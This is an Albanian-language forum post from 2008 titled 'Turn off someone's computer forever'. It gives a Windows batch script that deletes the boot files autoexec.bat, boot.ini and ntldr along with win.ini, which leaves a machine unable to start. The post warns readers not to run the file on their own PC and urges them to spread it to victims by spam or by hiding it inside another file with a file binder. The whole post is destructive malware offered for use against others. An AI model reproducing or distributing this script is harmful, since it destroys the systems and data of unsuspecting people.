betimi39

betimi39
 
HomeFAQSearchMemberlistUsergroupsRegisterLog in

Share | 
 

 Fike kompjuterin e dikujt per gjithmon >>>????

Go down 
AuthorMessage
kastratiPosts : 18
Join date : 2008-08-14

PostSubject: Fike kompjuterin e dikujt per gjithmon >>>????   Thu Aug 14, 2008 4:31 am

Fillimisht ,unė nuk mbajė pėrgjegjsi per dėmet qė mundė ti shkaktoni ju.

Hapim Notepadin dhe vendosim kėtė kodė:

@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini


E ruajmė kėtė fajll me qfardo emri mirpo me prapashtesen .bat pra emri.bat

Pėr ta ruajtur si bat file tek rubrika Text file document ndrrojeni ne All files.

Kujdes! Mos e hapni kėtė fajll ne PC tuaj.

Tash ju mbetet ta shperndani si tė dėshironi ju ,me spam apo edhe tia bashkangjitni njė fajlli tjetėr me ndonjė file binder.
Back to top Go down
View user profile
 
Fike kompjuterin e dikujt per gjithmon >>>????
Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
betimi39 :: Your first category :: Your first forum-
Jump to: